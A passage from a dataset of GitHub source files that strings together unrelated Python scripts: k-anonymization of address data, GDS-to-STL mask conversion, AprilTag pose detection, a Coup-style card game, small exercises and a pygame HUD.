expand=True)\r\nroot.mainloop()\r\n\r\n","repo_name":"jirawitkoko11/UTM","sub_path":"drone.py","file_name":"drone.py","file_ext":"py","file_size_in_byte":7405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13031300397","text":"import csv\nimport pandas as pd\nimport numpy as np\nimport copy\n\n# QI Values are [Block Range, StreetName, ZIP Code]\n# Block Range Anonymization: Full - Remove first digit - Remove second digit - removed all digits\n# StreetName anonymization: Full - remove half of name - remove full name\n# ZIPCODE Anonymization: FULL - remove 1 digit at a time.\nQI_ARRAY = [4, 2, 5]\nCURRENT_ARRAY = [0, 0, 0]\n\nclass QI_Count:\n def __init__(self, value, num):\n self.value = value\n self.num = num\n\n#QI_ARRAY will be used as a global variable for this specific dataset\ndef k_anonymize(df, k_value):\n qi_list = []\n print(\"1\")\n freq_list = make_freq_list(df)\n\n print(\"2\")\n print(freq_list)\n count = 1\n #Not sure what the second part of the while loop is about or how to incorporate it.\n # Every third time around, will remove one digit from ZIP Code\n # TODO - consider how empty zip codes mess up this algorithm\n while(freq_list['count'] < k_value).any():\n #Third time, just doing ZIP code anon, skipping rest of loop\n if count % 3 == 0 and count != 0:\n df = anonymize_attribute(df, \"ZIP Code\")\n freq_list = make_freq_list(df)\n # freq_check_duplicates is O(n^2), so we limit it to smaller freq_lists\n #if count > 3:\n # freq_check_duplicates(freq_list, k_value)\n \n count = count + 1\n continue\n most_uniq = find_uniq_values(df)\n df = anonymize_attribute(df, most_uniq)\n print(df.head())\n if isinstance(df, bool):\n print(\"uh oh\")\n exit(1)\n freq_list = make_freq_list(df)\n print(freq_list)\n count = count + 1\n print(df.head())\n \n# Requires dataframe\n# Makes a list of the frequency of a specific set of tuples. \ndef make_freq_list(df):\n freq_list = df.groupby(['ZIP Code', 'StreetName', 'Block Range']).size().reset_index().rename(columns={0:'count'}).sort_values(['count']).reset_index(drop=True)\n #Dropping any value where item is already anonymized from frequency list, as it shouldn't be counted.\n for index, row in freq_list.iterrows():\n if(row['ZIP Code'] == \"*****\" and row['StreetName'] == \"*\" and row['Block Range'] == \"*\"):\n freq_list.drop([index])\n\n return freq_list\n\n#This method looks to see if the ZIP code = \"*****\" and NIBRS, Block Range, and StreetName = another value. 
If so, it will delete the \n#row and add one to the count of the other value.\ndef freq_check_duplicates(freq_list, k_value):\n for index, row in freq_list.iterrows():\n print(\"index\" + str(index))\n if row['ZIP Code'] == \"*****\" and row['count'] < k_value:\n print('True')\n temp_s = row['StreetName']\n temp_b = row['Block Range']\n temp_count = row['count']\n for index_2, row_2 in freq_list.iterrows():\n if row['ZIP Code'] != \"*****\" and temp_s == row_2['StreetName'] and temp_b == row_2['Block Range']:\n freq_list.at[index_2, 'count'] = freq_list.at[index_2, 'count'] + temp_count\n freq_list.drop([index])\n break\n return freq_list\n\n#Finds the column with the most unique values\ndef find_uniq_values(df):\n zipc = len(pd.unique(df['ZIP Code']))\n street = len(pd.unique(df['StreetName']))\n block = len(pd.unique(df['Block Range']))\n vmax = max(zipc, street, block)\n if vmax == zipc:\n return \"ZIP Code\"\n if vmax == street:\n return \"StreetName\"\n if vmax == block:\n return \"Block Range\" \n\ndef anonymize_attribute(df, attribute_string):\n if attribute_string == \"ZIP Code\":\n if CURRENT_ARRAY[2] == 0:\n for index, row in df.iterrows():\n if pd.isnull(row['ZIP Code']):\n continue\n temp = row['ZIP Code']\n temp = list(temp)\n temp[4] = \"*\"\n temp = ''.join(map(str, temp))\n df.at[index, 'ZIP Code'] = temp\n CURRENT_ARRAY[2] = 1\n return df\n elif CURRENT_ARRAY[2] == 1:\n for index, row in df.iterrows():\n if pd.isnull(row['ZIP Code']):\n continue\n temp = row['ZIP Code']\n temp = list(temp)\n temp[3] = \"*\"\n temp = ''.join(map(str, temp))\n df.at[index, 'ZIP Code'] = temp\n CURRENT_ARRAY[2] = 2\n return df\n elif CURRENT_ARRAY[2] == 2:\n for index, row in df.iterrows():\n if pd.isnull(row['ZIP Code']):\n continue\n temp = row['ZIP Code']\n temp = list(temp)\n temp[2] = \"*\"\n temp = ''.join(map(str, temp))\n df.at[index, 'ZIP Code'] = temp\n CURRENT_ARRAY[2] = 3\n return df\n elif CURRENT_ARRAY[2] == 3:\n for index, row in df.iterrows():\n if pd.isnull(row['ZIP Code']):\n continue\n temp = row['ZIP Code']\n temp = list(temp)\n temp[1] = \"*\"\n temp = ''.join(map(str, temp))\n df.at[index, 'ZIP Code'] = temp\n CURRENT_ARRAY[2] = 4\n return df\n elif CURRENT_ARRAY[2] == 4:\n for index, row in df.iterrows():\n if pd.isnull(row['ZIP Code']):\n continue\n temp = row['ZIP Code']\n temp = list(temp)\n temp[0] = \"*\"\n temp = ''.join(map(str, temp))\n df.at[index, 'ZIP Code'] = temp\n CURRENT_ARRAY[2] = 5\n return df\n elif CURRENT_ARRAY[2] == 5:\n print(df.head())\n print(\"Shouldn't be here1\")\n return False\n #anything higher than this shouldn't be possible\n elif attribute_string == \"StreetName\":\n if CURRENT_ARRAY[1] == 0:\n for index, row in df.iterrows():\n if pd.isnull(row['StreetName']):\n continue\n temp = row['StreetName']\n length = len(row['StreetName'])\n temp = list(temp)\n #Cutting the string in half\n for i in range(int(length/2)):\n temp = temp[:-1]\n #Adding a * to the end of the half\n temp = ''.join(map(str, temp))\n temp = temp + \"*\"\n df.at[index, 'StreetName'] = temp\n CURRENT_ARRAY[1] = 1\n return df\n elif CURRENT_ARRAY[1] == 1:\n for index, row in df.iterrows():\n if pd.isnull(row['StreetName']):\n continue\n df.at[index, 'StreetName'] = \"*\"\n CURRENT_ARRAY[1] = 2\n return df\n elif CURRENT_ARRAY[1] == 2:\n print(df.head())\n print(\"Shouldn't be here.2\")\n return False\n elif attribute_string == \"Block Range\":\n if CURRENT_ARRAY[0] == 0:\n for index, row in df.iterrows():\n if pd.isnull(row['Block Range']):\n continue\n if row['Block 
Range'] == \"*\":\n continue\n temp = row['Block Range'] \n if int(temp) < 1000:\n df.at[index, 'Block Range'] = \"< 1000\"\n elif int(temp) >= 1000 and int(temp) < 2000:\n df.at[index, 'Block Range'] = \">= 1000 < 2000\"\n elif int(temp) >= 2000 and int(temp) < 3000:\n df.at[index, 'Block Range'] = \">= 2000 < 3000\"\n elif int(temp) >= 3000 and int(temp) < 4000:\n df.at[index, 'Block Range'] = \">= 3000 < 4000\"\n elif int(temp) >= 4000 and int(temp) < 5000:\n df.at[index, 'Block Range'] = \">= 4000 < 5000\"\n elif int(temp) >= 5000 and int(temp) < 6000:\n df.at[index, 'Block Range'] = \">= 500 < 600\"\n elif int(temp) >= 6000 and int(temp) < 7000:\n df.at[index, 'Block Range'] = \">= 6000 < 7000\"\n elif int(temp) >= 7000 and int(temp) < 8000:\n df.at[index, 'Block Range'] = \">= 7000 < 8000\"\n elif int(temp) >= 8000 and int(temp) < 9000:\n df.at[index, 'Block Range'] = \">= 8000 < 9000\"\n elif int(temp) >= 9000 and int(temp) < 10000:\n df.at[index, 'Block Range'] = \">= 9000 < 10000\"\n elif int(temp) >= 10000:\n df.at[index, 'Block Range'] = \">= 10000\"\n CURRENT_ARRAY[0] = 1\n return df\n elif CURRENT_ARRAY[0] == 1:\n for index, row in df.iterrows():\n if pd.isnull(row['Block Range']):\n continue\n temp = row['Block Range']\n if temp == \"< 1000\":\n df.at[index, 'Block Range'] = \"< 2000\"\n elif temp == \">= 1000 < 2000\":\n df.at[index, 'Block Range'] = \"< 2000\"\n elif temp == \">= 2000 < 3000\":\n df.at[index, 'Block Range'] = \">= 2000 < 4000\"\n elif temp == \">= 3000 < 4000\":\n df.at[index, 'Block Range'] = \">= 2000 < 4000\"\n elif temp == \">= 4000 < 5000\":\n df.at[index, 'Block Range'] = \">= 4000 < 6000\"\n elif temp == \">= 5000 < 6000\":\n df.at[index, 'Block Range'] = \">= 4000 < 6000\"\n elif temp == \">= 6000 < 7000\":\n df.at[index, 'Block Range'] = \">= 6000 < 8000\"\n elif temp == \">= 7000 < 8000\":\n df.at[index, 'Block Range'] = \">= 6000 < 8000\"\n elif temp == \">= 8000 < 9000\":\n df.at[index, 'Block Range'] = \">= 8000 < 10000\"\n elif temp == \">= 9000 < 10000\":\n df.at[index, 'Block Range'] = \">= 8000 < 10000\"\n else:\n df.at[index, 'Block Range'] = \">= 10000\"\n CURRENT_ARRAY[0] = 2\n return df\n elif CURRENT_ARRAY[0] == 2:\n for index, row in df.iterrows():\n if pd.isnull(row['Block Range']):\n continue\n temp = row['Block Range']\n if temp == \"< 2000\" or temp == \">= 2000 < 4000\":\n df.at[index, 'Block Range'] = \"< 4000\"\n elif temp == \">= 4000 < 6000\" or temp == \">= 6000 < 8000\":\n df.at[index, 'Block Range'] = \">= 4000 < 8000 \"\n elif temp == \">= 8000 < 10000\" or temp == \">= 10000\":\n df.at[index, 'Block Range'] = \">= 8000\"\n CURRENT_ARRAY[0] = 3\n return df\n\n","repo_name":"cwszolek2/Data-Security-Project-Kanonymity","sub_path":"kanonymize.py","file_name":"kanonymize.py","file_ext":"py","file_size_in_byte":10836,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"70836063555","text":"import sys # read command-line arguments\nimport os\nimport json\nimport gdspy # open gds file\nimport argparse\nimport logging\nimport uuid\nimport copy\nimport svgwrite\nimport subprocess\n\nlog_format = logging.Formatter('%(asctime)s - %(module)-10s - %(levelname)-8s - %(message)s')\nlogger = logging.getLogger('')\nlogger.setLevel(logging.NOTSET)\nch = logging.StreamHandler(sys.stdout)\nch.setFormatter(log_format)\nlogger.addHandler(ch)\n\ndef generate_layermask(layer_name: str, polys):\n logging.info(f\"generating {layer_name} with {len(polys)} polygons\")\n dwg = 
svgwrite.Drawing(f'masks/{layer_name}.svg', profile='tiny')\n    for p in polys:\n        dwg.add(svgwrite.shapes.Polygon(p.tolist(), fill='red'))\n    dwg.save()\n\ndef read_gds(filepath: str):\n    logger.info(f\"trying to read {filepath} as .gds file...\")\n    gdsii = gdspy.GdsLibrary()\n    gdsii.read_gds(filepath, units='import')\n    cells = [c for c in gdsii]\n    logger.info(f\"found {len(cells)} cells\")\n\n    logger.info(f\"I will now attempt to flatten and find the biggest cell...\")\n    cells_by_polys = []\n    for cit, cell in enumerate(cells):\n        cell_flat = copy.deepcopy(cell).flatten()\n        cells_by_polys.append((len(cell_flat.polygons), uuid.uuid4(), cell_flat))\n        logger.debug(f\"{cell.name}: {cit} of {len(cells)} done...\")\n        if cit > 50:\n            break\n\n    cc, _, cell = sorted(cells_by_polys)[-1]\n    logger.info(f\"it looks like {cell.name} is the major with {cc} polys.\")\n    layers = cell.get_polygons(True)\n    logger.info(f\"{cell.name} has {len(layers)} layers. Iterating and creating polygons...\")\n    for lname, polys in layers.items():\n        generate_layermask(lname, polys)\n\n#read_gds(\"../caravel_user_project/openlane/user_project_wrapper/runs/user_project_wrapper/results/magic/user_project_wrapper.gds\")\n\ndef emit_stl(filename):\n    logger.info(f\"working on {filename}\")\n\n    try:\n        os.remove(\"stls/generate_stl.scad\")\n    except:\n        pass\n    \n    with open(\"stls/generate_stl.scad\", \"w+\") as f:\n        f.write(\"linear_extrude(height = 0.1, center = true, scale = 1.0)\")\n        f.write(f\"import(file = \\\"{os.getcwd()}/masks/{filename}\\\", center = false, dpi = 96);\")\n\n    subprocess.call([\"openscad\", \"stls/generate_stl.scad\", \"-o\", f\"{os.getcwd()}/stls/{filename}.stl\"])\n\ndef convert_to_stls():\n    logger.info(f\"since blender is stupid, I'll generate .stl from .svg using openscad\")\n    files = os.listdir(\"masks/\")\n    for mfile in files:\n        emit_stl(mfile)\n    \nread_gds(\"../caravel_user_project/openlane/user_project_wrapper/runs/user_project_wrapper/results/magic/user_project_wrapper.gds\")\nconvert_to_stls()\n#python3 gds_to_json.py -g ../../caravel_user_project/openlane/user_project_wrapper/runs/user_project_wrapper/results/magic/user_project_wrapper.gds \n# -l ../../caravel_user_project/openlane/user_project_wrapper/runs/user_project_wrapper/results/lvs/user_project_wrapper.lvs.lef.json -o out.json\n","repo_name":"zbigos/GDS-Renderator","sub_path":"src/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"18312910959","text":"import datetime\nimport functools\nfrom typing import Callable, Any, List, Dict\nimport json\n\n\ndef build_converter(feature_type: str,\n                    configs: Dict[str, Any]\n                    ) -> Callable[[str], Any]:\n    if feature_type == 'int':\n        return int\n\n    if feature_type == 'float':\n        return float\n\n    if feature_type == 'str':\n        return _identity\n\n    if feature_type == 'bool':\n        return _parse_boolean\n\n    if feature_type == 'timestamp':\n        return functools.partial(_parse_timestamp, date_format=configs.get('format'))\n\n    if feature_type == 'list':\n        element_type = configs.get(\"element_type\")\n        delimiter = configs.get('delimiter')\n        converter = build_converter(element_type, configs)\n        return functools.partial(_parse_list, delimiter=delimiter, converter=converter)\n\n    if feature_type == 'pd.array':\n        element_type = configs.get(\"element_type\")\n        converter = build_converter(element_type, configs)\n        return functools.partial(_parse_pd_array, converter=converter)\n\n    raise 
KeyError(f'{feature_type} not supported. Currently bool, str, float, timestamp, int, pd.array and list are supported. '\n f'See documentation for more details')\n\n\ndef _parse_boolean(text: str\n ) -> bool:\n return text == 'True'\n\n\ndef _parse_timestamp(text: str,\n date_format: str\n ) -> datetime.datetime:\n return datetime.datetime.strptime(text, date_format)\n\n\ndef _parse_list(text: str,\n converter: Callable[[str],Any],\n delimiter: str) -> List[str]:\n return list(map(converter, text.split(sep=delimiter)))\n\n\ndef _parse_pd_array(text: str,\n converter: Callable[[str], Any]) -> List[str]:\n text = json.loads(text)\n #text = text.strip('][').replace('\"', '').split(',')\n # text = ast.literal_eval(text)\n return list(map(converter, text))\n\n\ndef _identity(text: str\n ) -> str:\n return text\n","repo_name":"elisabethfischer/non-item-transformers","sub_path":"src/asme/data/utils/converter_utils.py","file_name":"converter_utils.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3194944180","text":"class IntLiteral:\n def __init__(self,strval,intparser=None):\n self.strval=strval\n self.intparser=intparser or int\n \n def value(self):\n return self.intparser(self.strval)\n\n\n# arbitrary custom integer parser\ndef custint(x):\n if '.' in x:\n return int(x.split('.')[0])\n return int(x)\n\nsn1=IntLiteral('3')\npn1=sn1.value()\nprint(pn1,type(pn1)) # 3 \n\nsn2=IntLiteral('42.5',custint)\npn2=sn2.value()\nprint(pn2,type(pn2)) # 42 \n\n","repo_name":"heerdyes/gof-design-patterns","sub_path":"factorymethod/factorymethoddemo.py","file_name":"factorymethoddemo.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33316964307","text":"import numpy as np\nimport apriltag\nimport depthai as dai\nimport cv2\nfrom scipy.spatial.transform import Rotation as R\n\ncamera_parameters = {}\ncamera_parameters['IntrinsicMatrix'] = np.array([\n [788.5933, 0, 0],\n [-1.5284, 790.1151, 0],\n [267.2851, 257.6332, 1]])\ncamera_parameters['RadialDistortion'] = np.array([0.2647, -1.0395, 2.6651])\ncamera_parameters['TangentialDistortion'] = np.array([0.0031, 0.0104])\nnp.save('img/calibrate/parameters.npy', camera_parameters)\nK = camera_parameters['IntrinsicMatrix']\n\n\ndef create_pipeline():\n pipeline = dai.Pipeline()\n camRgb = pipeline.create(dai.node.ColorCamera)\n xoutRgb = pipeline.create(dai.node.XLinkOut)\n xoutRgb.setStreamName(\"rgb\")\n camRgb.setPreviewSize(400, 400)\n camRgb.setInterleaved(False)\n camRgb.setColorOrder(dai.ColorCameraProperties.ColorOrder.RGB)\n camRgb.preview.link(xoutRgb.input)\n return pipeline\n\n\ndef create_detector():\n options = apriltag.DetectorOptions(families=\"tag36h11\")\n detector = apriltag.Detector(options)\n return detector\n\n\ndef draw_tag(r, image, eularangle):\n (ptA, ptB, ptC, ptD) = r.corners\n ptB = (int(ptB[0]), int(ptB[1]))\n ptC = (int(ptC[0]), int(ptC[1]))\n ptD = (int(ptD[0]), int(ptD[1]))\n ptA = (int(ptA[0]), int(ptA[1]))\n # draw the bounding box of the AprilTag detection\n cv2.line(image, ptA, ptB, (0, 255, 0), 2)\n cv2.line(image, ptB, ptC, (0, 255, 0), 2)\n cv2.line(image, ptC, ptD, (0, 255, 0), 2)\n cv2.line(image, ptD, ptA, (0, 255, 0), 2)\n # draw the center (x, y)-coordinates of the AprilTag\n (cX, cY) = (int(r.center[0]), int(r.center[1]))\n cv2.circle(image, (cX, cY), 5, (0, 0, 255), -1)\n # draw the tag family on the image\n 
tagFamily = r.tag_family.decode(\"utf-8\")\n cv2.putText(image, tagFamily, (ptA[0], ptA[1] - 15),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n ARROW_LENGTH = 120\n dirangle = (eularangle[2] - 5) * np.pi / 180 * 1.8\n deltax = np.sin(dirangle) * ARROW_LENGTH\n deltay = ARROW_LENGTH / 2 * np.cos(dirangle)\n newcneter = r.center + np.array([deltax, deltay])\n cv2.circle(image, tuple(newcneter.astype(int)), 8, (255, 0, 0), 5)\n cv2.line(image, tuple(newcneter.astype(int)),\n tuple(r.center.astype(int)),\n (255, 0, 0), 2)\n\n\npipeline = create_pipeline()\ndetector = create_detector()\nqRgb: dai.DataOutputQueue\ninRgb: dai.ImgFrame\ntag: apriltag.Detection\nwith dai.Device(pipeline) as device:\n print('Connected cameras:', device.getConnectedCameraFeatures())\n qRgb = device.getOutputQueue(name=\"rgb\", maxSize=4, blocking=False)\n\n while True:\n inRgb = qRgb.get()\n image = inRgb.getCvFrame()\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n results = detector.detect(gray)\n for tag in results:\n homo = tag.homography\n num, Rs, Ts, Ns = cv2.decomposeHomographyMat(homo, K)\n r = R.from_matrix(Rs.T)\n eularangle = r.as_euler('xyz').T * 180 / np.pi\n","repo_name":"Seas00n/Big_Rover","sub_path":"AprilTag/apriltag_distance.py","file_name":"apriltag_distance.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41382671068","text":"# -*- coding:utf-8 -*- \n_author_ = 'jackie.ma'\n\ndef han_list(n,frm,to,temp):\n if n<2:\n to.append(frm.pop())\n else:\n fabi(n-1,frm,temp,to)\n fabi(1,frm,to,temp)\n fabi(n-1,temp,to,frm)\n\n\ndef fabi(n,frm,to,temp):\n\n if n<2:\n print(frm,'-->',to)\n s1.append([frm,'-->',to])\n\n else:\n fabi(n-1,frm,temp,to)\n #print('a----', n, '--from', frm, 'to', to, 'temp', temp)\n fabi(1,frm,to,temp)\n #to.append(frm.pop())\n #print('a----', n, '--from', frm, 'to', to, 'temp', temp)\n fabi(n-1,temp,to,frm)\n #print('a----', n, '--from', frm, 'to', to, 'temp', temp)\ndef hanoi(n, a, b, c):\n if n == 1:\n s2.append([a, '-->', c])\n print(a, '-->', c)\n else:\n hanoi(n - 1, a, c, b)\n s2.append([a, '-->', c])\n print(a, '-->', c)\n hanoi(n - 1, b, a, c)\n# 调用\n\n\ndef fact(n):\n if n<2:\n return 1\n else:\n y=n*fact(n-1)\n print('n=',n,'---',y)\n return y\nif __name__ == \"__main__\":\n nx=3\n a=[x for x in range(nx)]\n b,c=[],[]\n s1,s2=[],[]\n fabi(nx,'A','C','B')\n print('daan')\n hanoi(nx, 'A', 'B', 'C')\n if s1==s2:\n print(True)\n else:\n print('YIMA')\n print(s1)\n print(s2)\n","repo_name":"fajunma/Python","sub_path":"DLL/fabi.py","file_name":"fabi.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9752499688","text":"import torch\nimport numpy as np\nimport pandas as pd\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.functional as F\ndef CrossEntropyLoss(y_predict, y_target):\n return torch.sum(-y_target * torch.log(y_predict) - (1 - y_target) * torch.log(1 - y_predict))\n\nclass logisticmodel(nn.Module):\n def __init__(self):\n super().__init__()\n self.linear = nn.Linear(4, 1)\n \n def forward(self, x):\n x = self.linear(x)\n x = torch.sigmoid(x)\n return x\n\nmodel = logisticmodel()\noptimizer = torch.optim.SGD(model.parameters(), lr = 0.00001)\n\nD = torch.tensor(pd.read_csv('label.csv', header = None).values, dtype = torch.float)\nx_dataset = D[:, 0:4].view(-1,4)\n#x_dataset[:, 0], x_dataset[:, 1] = x_dataset[:,0]+x_dataset[:,1], 
x_dataset[:,2]+x_dataset[:,3]\n#x_dataset = x_dataset[:,0:2]\ny_dataset = D[:, 4].view(-1,1)\nduichen = True\nif duichen:\n for i in range(len(x_dataset)):\n if x_dataset[i, 0] < 0:\n x_dataset[i] = -x_dataset[i]\nlast_loss = 0\nfor i in range(200000):\n optimizer.zero_grad()\n y_predict = model(x_dataset)\n loss = CrossEntropyLoss(y_predict, y_dataset)\n loss.backward()\n optimizer.step()\n if i % 10 == 0:\n print('------\\n',loss, y_predict[y_dataset == 1], y_predict[y_dataset == 0])\n\n if abs(last_loss - loss) < 0.0001:\n print(last_loss, loss)\n oz = [item > 0.5 for item in y_predict]\n print(np.sum([oz[i] == y_dataset[i] for i in range(len(y_dataset))]), '/', len(y_dataset))\n break\n last_loss = loss\n\n","repo_name":"info-ruc/2317","sub_path":"2016202106/src/logistic.py","file_name":"logistic.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13873501739","text":"import sys\r\n\r\nINF = sys.maxsize\r\nN,M = map(int, sys.stdin.readline().split())\r\narr = [list(map(int, input().split())) for _ in range(N)]\r\nprint(arr)\r\nminArr = list()\r\n\r\nfor i in range(N):\r\n minNum = INF\r\n for j in range(M):\r\n if minNum > arr[i][j]:\r\n minNum = arr[i][j]\r\n minArr.append(minNum)\r\n\r\nprint(minArr)\r\nprint(max(minArr))\r\n","repo_name":"whiskey21/my-algorithm-book","sub_path":"그리디/숫자카드게임.py","file_name":"숫자카드게임.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11139097906","text":"from turtle import *\n\n\ndef szyfr(alphabet, subject):\n TurtleScreen._RUNNING = True\n vowels = \"aeiouy\"\n class rect_struct:\n def __init__(self, width, height, side):\n self.width = width; self.height = height; self.side = side\n def __iter__(self):\n return iter([self.width, self.height, self.side])\n def width_func(idx): return (idx + 1) * 10 \n def height_func(letter): return (alphabet.find(letter) + 1) * 10\n def side_func(letter): return 1 if letter not in vowels else -1\n\n def draw_rect(width, height, side):\n for _ in range(2):\n for length in (width, height):\n forward(length)\n left(90 * side)\n \n rectangles = [rect_struct(width_func(i), height_func(letter), side_func(letter))\n for i, letter in enumerate(subject)]\n\n pu()\n max_height = max(rect.height * rect.side for rect in rectangles)\n min_height = min(rect.height * rect.side for rect in rectangles)\n left(90); back((max_height + min_height) / 2); right(90)\n back(sum(rect.width for rect in rectangles) / 2)\n pd()\n for width, height, side in rectangles:\n draw_rect(width, height, side)\n pu(); forward(width); pd()\n\ndef redukcja(number):\n number = list(str(number))[::-1]\n changing = True\n while changing:\n changing = False\n idx = 0\n while idx < len(number) - 1:\n if number[idx] == number[idx + 1]:\n changing = True\n number.pop(idx + 1)\n number[idx] = str(2 * int(number[idx]))[-1]\n idx += 1\n \n return int(\"\".join(number[::-1]))\n\n\ndef ile(digits_n, digit):\n c = 0\n lo = 10 ** (digits_n - 1)\n if digits_n == 1: lo -= 1\n up = 10 ** digits_n\n for n in range(lo, up):\n if str(digit) in str(n):\n c += 1\n return c\n \n\n","repo_name":"jbachurski/logia-tryhard-saga","sub_path":"Ye Olde/Etap 2/2015/2015.py","file_name":"2015.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29351175388","text":"# -*- coding: 
utf-8 -*-\n\"\"\"\nCreated on Wed Apr 14 10:17:51 2021\n\n@author: nicol\n\"\"\"\nimport random\n\nclass Game:\n def __init__(self,coins, cards, maze):\n self.coins=coins\n self.cards=cards\n self.maze=maze\n \n def Starting_money(self):\n Bag_of_coins= self.coins\n return Bag_of_coins \n \n def Actions(self,action, array):\n validator=0\n while validator ==0:\n if action== \"income\":\n self.coins+=1\n return self.coins\n \n elif action == \"foreign aid\":\n self.coins+=2\n return self.coins\n \n elif action== \"coup\" :\n if self.coins>=7:\n self.coins-=7\n print(array)\n couped_player=input(\"Which player do you want to copue: \")\n while couped_player not in array:\n print(array)\n couped_player=input(\"You must give a valid player: \")\n return couped_player\n else:\n print(\"You don´t have enough coins to make that action\\n\")\n return \"not valid\"\n \n \n elif action== 'taxes':\n self.coins+=3\n return self.coins\n \n elif action== \"murder\":\n if self.coins >=3:\n self.coins-=3\n print(array)\n murdered_player=input(\"Which player do you want to kill: \")\n while murdered_player not in array:\n print(array)\n murdered_player=input(\"You must give a valid player: \")\n return murdered_player\n else:\n print(\"You don´t have enough coins to make that action\\n\")\n return \"not valid\"\n \n elif action == \"extorsion\":\n print(array)\n stealed_player=input(\"Which player do you want to steal from: \")\n while stealed_player not in array:\n print(array)\n stealed_player=input(\"You must give a valid player: \")\n return stealed_player\n \n elif action== \"change\":\n if len(array)>1:\n candidates=[]\n random.shuffle(self.maze)\n counter=0\n while counter \",str(counter))\n counter+=1\n \n answer=input(\"Please choose your combination: \")\n while answer!=\"1\" and answer!=\"2\" and answer!=\"3\" and answer!=\"4\" and answer!=\"5\" and answer!=\"6\":\n answer=input(\"You must give a valid answer: \") \n \n if int(answer)==1:\n return option1\n if int(answer)==2:\n return option2\n if int(answer)==3:\n return option3\n if int(answer)==4:\n return option4\n if int(answer)==5:\n return option5\n if int(answer)==6:\n return option6\n else:\n random.shuffle(self.maze)\n changer= self.maze.pop(0)\n option1=[changer]\n option2=[array]\n options=[option1,option2]\n print(\"\\nYour options are:\")\n number=1\n for value in options:\n print(str(value)+\" ---> \"+str(number))\n number+=1\n \n answer=input(\"Please choose your combination: \")\n while answer!=\"1\" and answer!=\"2\":\n answer=input(\"You must give a valid answer: \") \n if int(answer)==1:\n return option1\n if int(answer)==2:\n return option2\n \n \n \n \n else:\n return \"not valid\"\n \n def Steal_actions(self, bag_of_coins):#steals coins from other players\n if bag_of_coins>=2:\n \n return bag_of_coins-2\n else:\n if bag_of_coins==0:\n print(\"This player has no coins left\")\n return bag_of_coins\n else:\n return bag_of_coins-1\n \n def Influence(self, action):\n \n if action==\"tax\":\n return \"duke\"\n \n elif action==\"murder\":\n return \"assasin\"\n \n elif action==\"extorsion\":\n return \"captain\"\n \n elif action==\"change\":\n return \"ambassador\"\n else:\n pass\n \n def CounterInfluence(self,action):\n if action==\"foreign aid\":\n return \"duke\"\n \n if action==\"murder\":\n return \"countess\"\n \n if action==\"extorsion\":\n return \"captain\"\n \n def Solution(self, looser, array):\n print(array)\n card_to_turn=input(looser+\", you have lost, which card do you want to turn: \")\n while card_to_turn not in 
array:\n card_to_turn=input(\"You must give a card from your maze: \")\n return card_to_turn\n \n def Refresh(self, card):\n random.shuffle(self.maze)\n new_card=self.maze.pop(0)\n self.maze.append(card)\n return new_card\n \n \n \n \n \n \n \n ","repo_name":"ICC3103-202110/proyecto-01-silva_vial","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":6657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6394338655","text":"import pygame\r\nimport pygame.font\r\n\r\nclass Hub():\r\n\t\"\"\"Borders, Health display, Special, and score display.\"\"\"\r\n\t\r\n\tdef __init__(self, ai, var, screen):\r\n\t\tself.screen = screen\r\n\t\tself.ai = ai\r\n\t\tself.var = var\r\n\t\t\r\n\t\t# Card\r\n\t\tself.card = pygame.image.load('images/hub/p_claude.png')\r\n\t\tself.card = pygame.transform.scale2x(self.card)\r\n\t\tself.c_rect = self.card.get_rect()\r\n\t\tself.c_rect.bottom = ai.height - 12\r\n\t\tself.c_rect.centerx = ai.width/2\r\n\t\t\r\n\t\t# Initialize health\r\n\t\tself.h_bar = float(100)\r\n\t\tself.h_shade_1 = (160, 248, 104)\r\n\t\tself.h_shade_2 = (72, 216, 0)\r\n\t\tself.h_shade_3 = (64, 136, 32)\r\n\t\tself.h_y = self.c_rect.bottom - 72\r\n\t\t\r\n\t\t# Initialize shield\r\n\t\tself.s_bar = float(100)\r\n\t\tself.s_shade_1 = (247, 238, 54)\r\n\t\tself.s_shade_2 = (247, 177, 0)\r\n\t\tself.s_shade_3 = (247, 85, 0)\r\n\t\tself.s_y = self.h_y + 24\r\n\t\t\r\n\t\t# Score font\r\n\t\tself.score = 0\r\n\t\tself.s_color = (255, 255, 255)\r\n\t\tself.s_font = pygame.font.SysFont(None, 28)\r\n\t\t\r\n\t\tself.pause = 1\t\t\r\n\t\tself.chapter = 0\r\n\t\tself.current = 0\r\n\t\tself.death = 0\r\n\t\tself.timed = 0\r\n\t\t\r\n#\t\tself.init = 0\r\n#\t\tself.start = 1\r\n#\t\tself.inputs = 1\r\n#\t\tself.backgrounds = 1\r\n#\t\tself.bullets = 1\r\n#\t\tself.lasers = 1\r\n#\t\tself.ship = 1\r\n#\t\tself.enemy = 1\r\n#\t\tself.hub = 1\r\n\t\t\r\n\t\t# Skip Title Scren\r\n\t\tself.init = 1\r\n\t\tself.start = 0\r\n\t\tself.inputs = 